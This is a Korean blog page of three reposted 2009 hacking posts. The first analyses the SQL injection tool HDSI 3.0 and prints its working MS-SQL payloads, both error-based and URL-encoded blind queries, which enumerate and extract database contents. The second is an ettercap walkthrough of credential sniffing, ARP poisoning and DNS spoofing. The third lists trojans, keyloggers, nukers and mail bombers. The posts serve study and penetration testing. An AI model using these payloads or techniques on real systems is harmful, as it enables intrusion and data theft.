'해킹툴'에 해당되는 글 5건

  1. 2009.11.12 모의해킹 HDSI, NBSI 툴 메뉴얼
  2. 2009.10.20 ETTERCAP을 이용한 Sniffing, ARP Sfooping, DNS Sfooping
  3. 2009.09.12 해킹툴 기능별 분류 (4)
2009.11.12 19:21

모의해킹 HDSI, NBSI 툴 메뉴얼

중국에서 SQL Injection 공격시 많이 활용되는 툴입니다.

불특정 대상을 통해 공격 허용 여부를 판단하고 정보 유출에 활용될 수 있습니다.
추가로 HDSI 3.0 쿼리에 대한 분석내용입니다.

중국 SQL Injection Tools 중 가장 보편적이라고 할 수 있는 HDSI 3.0 중
SQL Injection을 위한 Query에 대해서 중점적으로 살펴보겠습니다.
UI에 대한 설명과 사용법은 생략합니다.

HEAD ;create%20table%20t_jiaozhu(jiaozhu%20varchar(200)) HTTP/1.1

헤더를 조작해서 table를 생성합니다.
이 쿼리 때문에 공격을 당했을 경우 't_jiaozhu' 테이블이 남게 되는 것이죠..

and(char(94)%2Bdb_name()%2Bchar(94))>0
nvarchar .. '^DB_NAME^'..(..)

위 쿼리 입력시 IIS 응답코드 '500'을 통해서 '^'와 '^' 사이에 DB 이름이 나타납니다.

권한을 확인합니다.
And%20(char(94)%2Bcast(IS_SRVROLEMEMBER('sysadmin')%20as%20varchar(1))%2Bchar(94))>0
varchar .. '^1^'

사용자를 확인합니다.
And%20char(94)%2Buser%2Bchar(94)=0
varchar .. '^dbo^'..(..)

DB 이름을 확인합니다.
And%20char(94)%2Bdb_name()%2Bchar(94)=0
nvarchar .. '^DB_NAME^'..(..)

;declare%20@a%20int--

이렇게 해서 사용자명과 DB 이름을 획득합니다.
그 후 @a를 int형으로 선언하네요..

DECLARE 문을 사용하여 일괄 처리나 프로시저의 본문에 변수를 선언하고 SET 또는 SELECT 문을 사용하여 값을 할당합니다. 이 문을 사용하여 커서 변수를 선언하고 다른 커서 관련 문과 함께 사용할 수 있습니다. 선언한 후 모든 변수가 NULL로 초기화됩니다.

DECLARE
     {{ @local_variable [AS] data_type }
    | { @cursor_variable_name CURSOR }
    | { @table_variable_name [AS] < table_type_definition > }
     } [ ,...n]

다음 예에서는 @find라는 로컬 변수를 사용하여 성이 'Man'으로 시작하는 모든 연락처 정보를 검색합니다.

USE AdventureWorks;
GO
DECLARE @find varchar(30);
SET @find = 'Man%';
SELECT LastName, FirstName, Phone
FROM Person.Contact
WHERE LastName LIKE @find;

다음 쿼리문을 보기에 앞서 CAST 연산자에 대해서 간단히 알아보고 넘어가겠습니다.

Syntax for CAST:
CAST ( expression AS data_type [ (length ) ])

expression
    유효한 식입니다.

data_type
    대상 시스템에서 제공하는 데이터 형식입니다. xml, bigint 및 sql_variant가 있습니다.
    별칭 데이터 형식은 사용할 수 없습니다.
    사용 가능한 데이터 형식에 대한 자세한 내용은 데이터 형식(Transact-SQL)을 참조하십시오.

length
    nchar, nvarchar, char, varchar, binary 또는 varbinary 데이터 형식의 선택적 매개 변수입니다.
    
style
    datetime 또는 smalldatetime 데이터를 문자 데이터(nchar, nvarchar, char, varchar, nchar 또는 nvarchar 데이터 형식)로 변환하거나
    알려진 날짜 또는 시간 형식의 문자 데이터를 datetime 또는 smalldatetime 데이터로 변환하는 데 사용되는 날짜 형식 스타일
    또는 float, real, money 또는 smallmoney 데이터를 문자 데이터(nchar, nvarchar, char, varchar, nchar 또는 nvarchar 데이터 형식)로
    변환하는 데 사용되는 문자열 형식 스타일입니다. style이 NULL이면 반환되는 결과도 NULL입니다.

// 전체 사용자 정의 테이블 개수 확인
And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20
[DB_NAME]..[sysobjects]%20where%20xtype=char(85))=0

varchar .. '^5^'

And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))
%20from(Select%20Top%203%20id,name%20from%20[DB_NAME]..sysobjects]%20
Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)
%20T%20order%20by%20name%20desc,id%20asc)>0

^TABLE_NAME^

And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(94)%20
From%20[DB_NAME]..[COLUMN__NAME]%20Where%201=1)>0

varchar .. '^1^'

위와 같은 쿼리문을 통해  각각의 테이블에 존재하는 자료의 개수까지 파악합니다.

다음 쿼리문을 보기에 앞서 From 구정의 Alias에 대해서 간단히 알아보고 넘어가겠습니다.

FROM { <table_source> } [ ,...n ] ]
<table_source> ::=
{
        table_or_view_name [ [ AS ] table_alias ] [ <tablesample_clause> ]
        [ WITH ( < table_hint > [ [ , ]...n ] ) ]
    | rowset_function [ [ AS ] table_alias ]
        [ ( bulk_column_alias [ ,...n ] ) ]
        | user_defined_function [ [ AS ] table_alias ] [ (column_alias [ ,...n ] ) ]
    | OPENXML <openxml_clause>
    | derived_table [ AS ] table_alias [ ( column_alias [ ,...n ] ) ]
    | <joined_table>
    | <pivoted_table>
    | <unpivoted_table>
      | @variable [ [ AS ] table_alias ]
        | @variable.function_call ( expression [ ,...n ] ) [ [ AS ] table_alias ] [ (column_alias [ ,...n ] ) ]
}

즉 from table_or_view_name [AS] A where A.name='aehwamong'
이런식의 표현이 가능하다는 것입니다.

또한 sysobject라는 테이블과 syscolumns라는 테이블에 대해서 간단히 살펴보겠습니다.
sysobjects는 DB에 생성된 Object에 대한 정보를 가지고 있는 테이블 입니다.
syscolumns DB에 있는 모든 테이블 및 뷰의 모든 열에 대한 행,
그리고 저장 프로시저의 각 매개 변수당 한 개의 행을 반환합니다.

// 해당 테이블의 컬럼 개수 확인 - 6개
And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20
from%20[DB_NAME]..[syscolumns]%20A,[DB_NAME]..sysobjects]%20B%20
where%20A.id=B.id%20and%20B.name='[TABLE_NAME]')>0

varchar .. '^6^'..(..)

// 컬럼수 만큼 반복하면서 컬럼 이름을 확인합니다.
And%20(select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(80))
%20from(Select%20Top%201%20B.name%20from%20[DB_NAME]..[sysobjects]%20A%20,[DB_NAME]..syscolumns]%20B%20where%20A.id=B.id%20and%20A.name='[TABLE_NAME]'
%20order%20by%20B.name%20asc)%20T%20order%20by%20name%20desc)>0

varchar .. '^[COLUMN_NAME]^'..(..)

// 각 컬럼에 자료형을 확인합니다. 175면 'varchar' 형입니다.
And%20(select%20Top%201%20char(94)%2Bcast(B.xtype%20as%20varchar(80))%2Bchar(94)%20
from%20[DB_NAME]..[sysobjects]%20A,[DB_NAME]..syscolumns]%20B%20
where%20A.id=B.id%20and%20A.name='[TABLE_NAME]'%20and%20B.name='[COLUMN_NAME]')>0

varchar .. '^175^'..(..)

// 획득한 DB, Table, Columns 정보를 이용하여 특정 값을 획득합니다.
And%20(select%20top%201%20char(94)%2Bcast(Column1%20as%20varchar(8000))%2Bchar(94)%20%20from%20(%20select%20top%201%20Column1,Column2%20from%20[DB_NAME]..[TABLE_NAME]%20order%20by%20Column1%20desc,Column2%20asc%20)%20as
%20as_TableName%20order%20by%20Column1%20asc,Column2%20desc%20)>0

And%20(select%20top%201%20char(94)%2Bcast(Column2%20as%20varchar(8000))%2Bchar(94)%20%20from%20(%20select%20top%201%20Column1,Column2%20from%20[DB_NAME]..[TABLE_NAME]%20order%20by%20Column1%20desc,Column2%20asc%20)%20as%20
as_TableName%20order%20by%20Column1%20asc,Column2%20desc%20)>0

블라인드 공격을 할 경우에는 다음과 같은 쿼리문을 이용합니다.

%20and%20(select%20count(1)%20from%20sysobjects)>0
이 쿼리를 통해서 인젝션 성공했을 경우 IIS 응답코드 '200'을 획득할 것입니다.

%20%61%6E%64%20%28%73%65%6C%65%63%74%20%6C%65%6E%28%75%73%65%72%29%29%3C%33%32
위 쿼리를 디코딩 하면 "and (select len(user))<32"와 같습니다.
사용자 이름의 길이를 확보하기 위한 쿼리네요.

%20%61%6E%64%20%28%73%65%6C%65%63%74%20%6C%65%6E%28%75%73%65%72%29%29%3C%31%36 -> 200
%20%61%6E%64%20%28%73%65%6C%65%63%74%20%6C%65%6E%28%75%73%65%72%29%29%3C%38       -> 200
%20%61%6E%64%20%28%73%65%6C%65%63%74%20%6C%65%6E%28%75%73%65%72%29%29%3C%34       -> 200
%20%61%6E%64%20%28%73%65%6C%65%63%74%20%6C%65%6E%28%75%73%65%72%29%29%3C%32       -> 500
%20%61%6E%64%20%28%73%65%6C%65%63%74%20%6C%65%6E%28%75%73%65%72%29%29%3C%33       -> 500
%20%61%6E%64%20%28%73%65%6C%65%63%74%20%6C%65%6E%28%75%73%65%72%29%29%3C%34       -> 200
이렇게 쿼리를 보내서 결과를 보고 사용자 이름의 길이를 판단합니다.
위의 경우 32 / 16 / 8 / 4 / 2 순서대로 요청을 해서 IIS 응답코드 '500' 를 확인합니다.
이후 가장 최근에 입력한 "사용자  길이 +1" 값을 가지고 요청해서 '200'코드를 확인합니다.
사용자 이름의 값은 가장 마지막 '500'코드 확인시 전달한 값이 됩니다.
즉 위의 경우에는 '3'이 됩니다.

%61%6E%64%20%28%73%65%6C%65%63%74%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28%75%73%65%72%2C%31%2C%31%29%29%29%3C%38%30

%61%6E%64%20%28%73%65%6C%65%63%74%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28%75%73%65%72%2C%32%2C%31%29%29%29%3C%38%30

%61%6E%64%20%28%73%65%6C%65%63%74%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28%75%73%65%72%2C%33%2C%31%29%29%29%3C%38%30

%61%6E%64%20%28%73%65%6C%65%63%74%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28%75%73%65%72%2C%31%2C%31%29%29%29%3C%31%30%34

%61%6E%64%20%28%73%65%6C%65%63%74%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28%75%73%65%72%2C%32%2C%31%29%29%29%3C%31%30%34

각각의 디코딩 결과는 다음과 같습니다.
and (select ascii(substring(user,1,1)))<80
and (select ascii(substring(user,2,1)))<80
and (select ascii(substring(user,3,1)))<80
and (select ascii(substring(user,1,1)))<104
and (select ascii(substring(user,2,1)))<104

블라인드 SQL Injection 공부를 해 보신 분들은 다 아실 것입니다.
 

SUBSTRING ( value_expression ,start_expression , length_expression )
value_expression
    character, binary, text, ntext 또는 image 식입니다.

start_expression
    반환된 문자가 시작되는 위치를 지정하는 정수 또는 bigint 식입니다.
    start_expression이 0보다 작으면 오류가 발생하면서 문이 종료됩니다.
    start_expression이 값 식의 문자 수보다 크면 길이가 0인 식이 반환됩니다.

length_expression
    반환될 value_expression의 문자 수를 지정하는 양의 정수 또는 bigint 식입니다.
    start_expression이 음수이면 오류가 발생하면서 문이 종료됩니다.
    start_expression과 length_expression의 합계가 value_expression의 문자 수보다 크면 전체 값 식이 반환됩니다.
    
반환형식
    expression이 지원되는 문자 데이터 형식 중 하나이면 문자 데이터를 반환합니다.
    expression이 지원되는 binary 데이터 형식 중 하나이면 이진 데이터를 반환합니다.
    반환되는 문자열은 다음 표에 표시된 항목을 제외하고 지정된 식과 같은 형식입니다.

일반적인 Blind SQL Injection 공격에는 다음과 같은 쿼리가 사용됩니다.
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109

select 함수로 사용자 테이블을 선택하고,
substring을 이용해서 첫 번째 글자를 선택하고,
lower()을 이용해서 이를 소문자로 바꾼 다음,
ascii를 이용해서 그 문자의 아스키 값을 획득한다.
만약 이를 통해서 정상적인 결과를 얻었다면 첫 번째 문자는 코드값 109(m)보다 큰 것이다.

AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116

위와 같이 입력해서 아무것도 획득하지 못했다면 그 값은 아스키 코드값 116(t)인 것 보다 작다는 것이다.
위의 결과로 첫 번째 문자의 아스키 코드값은 110 이상 115 이하인걸 알 수 있다.
이러한 일을 반복하여 그 범위를 줄여 나가다 보면 특정 문자를 알 수 있을 것이다.

AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) = 111

만약 위와 같은 문장이 정상적인 페이지를 보여준다면, 첫 번째 문자의 아스키 코드 값은 111이며, 그에 해당하는 문자는 (다들 아시겠지만) ‘o’ 이다.

참고사이트
http://www.net-security.org/dl/articles/Blind_SQLInjection.pdf
http://msdn.microsoft.com/ko-kr/library/ms187748(SQL.100).aspx
http://msdn.microsoft.com/ko-kr/library/ms188927.aspx
http://technet.microsoft.com/ko-kr/library/ms187928.aspx    
http://msdn.microsoft.com/ko-kr/library/ms177634.aspx       
http://msdn.microsoft.com/en-us/library/aa260398(SQL.80).aspx  
http://msdn.microsoft.com/en-us/library/aa260447(SQL.80).aspx


출처 : http://blog.naver.com/pmj09142


Trackback 1 Comment 0
2009.10.20 10:29

ETTERCAP을 이용한 Sniffing, ARP Sfooping, DNS Sfooping

오픈소스 소프트웨어로서, GUI 를 지원하기 때문에 사용하기 편하다.

기본적인 스니핑 기능을 가지고 있으며, arp poisoning,icmp redirect, Port Stealing, DHCP Spoofing 등의 기본 기능도 가지고 있다.

그리고 플러그인을 통한 dns spoofing, dos attack 등을 지원하며 역으로 이런 공격을 찾는 search arp poisoner, search promisc 등의 기능도 가지고 있다. 사용하기에 따라서 매우 유용한 툴이라고 생각된다. 

 

1. Ettercap  설치

ettercap 을 위해서는 libnet,libpcap,libssl,ncurses 라이브러리가 필요하다. 다운받아서 설치 해준후 ettercap 을 설치해준다.

libpcap 은 rpm 형태로 이미 설치되어 있을시 삭제해주고 0.8.1 버전을 설치해 줘야 한다.

이후엔 필요 라이브러리 들을 tar zvxf 로 풀어주고 ./configure;make;make install 해준다.
마지막으로 ettercap 을 설치.

 

2. Ettercap 실행

# ettercap -G -n 255.255.255.0                   => -G 는 GUI , -n 은 netmask 를 의미한다.

먼저 스니핑할 NIC 를 선택해준다. eth0 을 선택한다.

다음으로 할 것은 네트워크에 어떤 호스트가 있는지 스캔하는것!

 

3. 스니핑

이제 스니핑을 시작해보자. Ctrl + W 를 눌러도 된다.

텔넷 접속 패킷을 스니핑하여 id 와 password 를 알아냄.

자동적으로 패킷속에서 주요 키워드 (ID,PASSWORD 등의) 를 보여준다.

 

4. ARP Poisoning(Spoofing) + DNS Spoofing

Mitm 을 클릭해보면 기본적으로 4가지 공격이 있다.
ARP Spoofing 에 해당하는 ARP Poisoning 을 해보자.

 => 모든 호스트에 대한 MAC Table 이 공격자(Red Hat) 으로 바뀌었다. 이제 모든 통신은 Attacker Host 를 거치게 된다. ettercap 의 filter 기능을 사용하여 패킷을 중간에서 변조한 후 보내줄 수 있다.

이제 모든 패킷은 attacker host 를 거쳐서 가므로, dns 쿼리 패킷 또한 예외일 수 없다.

우선 dns spoofing 모듈에서 사용하는 etter.dns  파일을 편집해야 한다.

# vi /usr/local/share/ettercap/etter.dns

target 호스트들이 네이버에 대한 dns 쿼리를 날릴 시 192.168.0.6 으로 돌려주도록 했다.
192.168.0.6 은 실습을 위해 임의로 구축한 웹서버이며, 실제 공격에서는 악성코드가 삽입된 사이트로 유도할 수 있을 것이다.

이제 Plugins 메뉴에서 dns_spoof module을 활성화 시킨다.

공격당하고 있는 네트워크의 호스트에서 www.naver.com 을 질의 한 결과.

정상적인 상태(위) 와 dns spoofing 을 하고 있는 상태(아래) 

 * 실제 www.naver.com 을 접속해본 결과

========================================================================================================

ettercap 을 이용한 sniffing 과 arp,dns spoofing 을 알아보았다. ettercap 을 사용해본 결과 실제 해킹에서도 쓰일 만큼 꽤나 유용하고 강력한 도구라고 생각된다. 하지만 반대로 plugin 기능중에 search poisoner 기능과 search promisc 기능도 가지고 있으므로 보안도구로서도 활용될 수 있을 것으로 보인다.

어떤 툴이든 사용자에 따라 해킹툴로도,보안툴도 될 수 있다는 것을 다시 한번 확인하게 되었다. ^^


출처 : http://blog.naver.com/kimhmin85


Trackback 0 Comment 0
2009.09.12 18:22

해킹툴 기능별 분류

==============================================================================
Trojan Virus / Hacking Tool
==============================================================================
Back Orifice 2000 --- cDc에서 공개한 백 오리피스 2000
Back Orifice 1.20 --- cDc 에서 공개한 백 오리피스
Back Orifice 1.3 --- 역시 BO의 업그레이드 버전
주민등록번호생성기 --- 주민등록 번호 생성기
Infector 2 --- V3에 안 잡히는 BOSERVE.EXE
Deep Bo --- BO의 업그레이드 버전!! (편리한 IP Sweep 기능)
Bo Plug-in --- 3가지 BO 플러그 인 (ButtTrumpet, SilkRope, BOFTP)
No BO 13a --- BO 해킹 방지 전문적으로 차단하는 프로그램
Net Bus 1.70 --- BO랑 쌍벽을 이루는 Trojan Hacking 프로그램
Net Bus Pro B --- 넷버스 2 프로 베타 버전 원제는 NetBus 2 Atomic Toxic
Ner Bus Pro 2.01 --- 넷버스 프로 2.01
Netbus Pro 2.1 Dropper --- Netbus Pro 2.1 Dropper
Lock Down 2000 Trojan Virus --- 전문 검사+치료 프로그램
BO SPY --- BO Gui쓰는 사람에게
Cleaner 2.0 --- bo 검사 & 치료 프로그램
BO Scanner --- Cleaner 2.0과 비슷한 프로그램
BO Remove --- BO만 치료
Modem Jammer --- IP경로 지우는 프로그램
Infector 2 --- V3에 안 잡히는 BOSERVE.EXE
스쿨버스 --- 스쿨버스입니다.
Deepthroat --- nobo에 안걸 리는 bo 서버
Subseven --- v1.7 트로이입니다.
Subseven --- 2.1 버그 패치 된 것
Pphucker --- pphucker라는 트로이

==============================================================================
포트스캔
==============================================================================
Port Scanner --- 포트 스캐너입니다.
Port Pro //
Port Test //
ChaOscan //
Tcp port scanner //
FTP Scanner --- IP주소로 FTP서버를 찾아줌

==============================================================================
WWW해킹
==============================================================================
Wwwhack98 --- 가장 잘 알려진 웹 해킹 프로그램
Webcrack --- 특별한 기능이 있는 웹 해킹 프로그램
HackerTTP1_3 --- 가장 빠른 웹 해킹 프로그램
Goldeneye --- Goldeneye라는 웹 해킹 프로그램


==============================================================================
누킹
==============================================================================
Mass nuker --- 매우 강력한 누킹 프로그램
Port Fuck --- 윈도우 98의 포트를 막아줌
Wiin nuke --- 95 화면을 먹통으로 만들어 버림
Nuke --- 강력한 누킹 프로그램
Nuke`em --- 컴퓨터를 다운시켜 버림
E-mail Nuker --- 상대방의 E-MAIL을 날려버림
Voob --- 컴퓨터를 다운시켜 버림

===============================================================================
키 로그
==============================================================================
Keylog 97 --- 키보드를 통해 누른 어떤 글자도 날짜별로 체계적으로 저장
Keylog25 //
Passpy //
Keylog //
Key rec //

=============================================================================
유닉스/리눅스
==============================================================================
폭탄메일 스크립트 --- 리눅스/유닉스용 폭탄메일
satan --- 취약점을 찾아내는 SATAN이라는 툴
saint --- SATAN이 개선된 SAINT
hack unix --- 유닉스용 해킹 프로그램
fire wall --- 리눅스용 방화벽
스니퍼 --- 몰래 엿보는 프로그램

==============================================================================
메일봄버
==============================================================================
AnonMail --- 자신의 이메일 주소를 원하는데로..
Avalanche --- 폭탄 메일
QFbomber --- 사용법이 쉬운 메일 봄버
Aenima17 --- 메일 봄버
Bomb Mail --- 메일 봄버
E-mail Bombing --- 메일 봄버
Kaboom3 --- 메일을 999장 보냄
Port Fuck! --- Win98 사용자에게 폭탄멜 보내기(누킹 툴 W98)

==============================================================================
크래커
===============================================================================
bus hacker --- 넷버스의 패스워드를 바꿔줌
John the ripper --- 유닉스 PASSWD화일을 해독
Crack Jack //
DateCrack --- 날짜제한을 없애줌
Uunix password cracker --- 유닉스 패스워드 크래커. 도스용
Zip ZIP --- 화일의 패스워드를 크랙
트럼펫윈속 --- 트럼펫윈속의 패스워드를 크랙
UNP --- 자체 압축기법 해제
UX --- 자체 압축기법 해제
마이크로 excel cracker --- 엑셀의 암호를 없애줌
Soft Ice --- 윈도우용 소프트 아이스
화면보호기 cracker --- 윈도우 스크린 세이버의 암호를 풀어줌
John The Ripper 1.0 --- 가장 유명하고 강력한 크래킹 프로그램으로 전설적인 크래킹 기록을 세움
codex TCP/IP Hacker

==============================================================================
패스워드
=============================================================================
Dripper --- 현재 어떤 ID와 PW로 접속했는지 알려줌
Revelation --- 윈도우에서 ****으로 표시된 PW를 알려줌
Cmos password --- CMOS의 패스워드를 마음데로

==============================================================================
바이러스
=============================================================================
에루살렘
핑퐁
바이러스 메이커 1,2,3

============================================================================
방어/추적
==============================================================================
Cleaner 2.0 --- 38개의 트로이를 스캔, 제거툴
Visual Route --- ip만 입력하면 상대방의 국가, 지역까지..
Lock Down 2000 --- 클리너에 버금가는 트로이 스캐너
X-ray 파일 분석기
Nobo --- BO 침투자를 막아주고 IP를 알려줌
Bospy --- 딥보 침투자에게 역해킹..
No Nuke --- 누킹을 막아줌
Nuke Nabber --- 누깅을 막아줌
Neotrc201 --- IP 추적기
Antigen102
Net Buster --- 넷버스를 없애주고 침입자를 물리
Fire wall 98 --- 개인 방화벽
Bo remover --- 백오리피스를 빠른속도로 없애줌
Conseal fire wall --- 개인 방화벽
T.D.S.2 --- 294개의 트로이를 제거해줌

===========================================================================
필수유틸
=============================================================================
Jammer --- 자신의 접속 경로를 지워줍니다.
HAKTEK --- 포트스캔, 핑거, 메일봄버 등이 하나로
com2exe --- *.com을 *.exe화일로...
bat2exe --- *.bat를 *.exe화일로...
exe2com --- *.exe화일을 *.com화일로...
mouse.com --- 가끔 필요한 마우스 띄우는 프로그램
winnt->dos --- 윈도우nt 파일을 도스에서 마운트


Trackback 0 Comment 4
  1. Atom 2010.03.25 09:12 address edit & del reply

    좋은 정보 감사해요!!
    포스팅 해갈께요...

  2. ㅎㅎ 2010.11.15 16:16 address edit & del reply

    언제적 프로그램인지 ㅎㅎ

  3. 보안 2011.01.17 02:38 address edit & del reply

    좋은자료 감사요

  4. 신(이 아니고 병신) 2012.07.17 18:38 address edit & del reply

    그런걸로 리눅스도 해킹할 수 있을려나 스크랩트 키디들이 쓰는건 대부분 윈도우만 해킹하지 않나? 그런가 시발???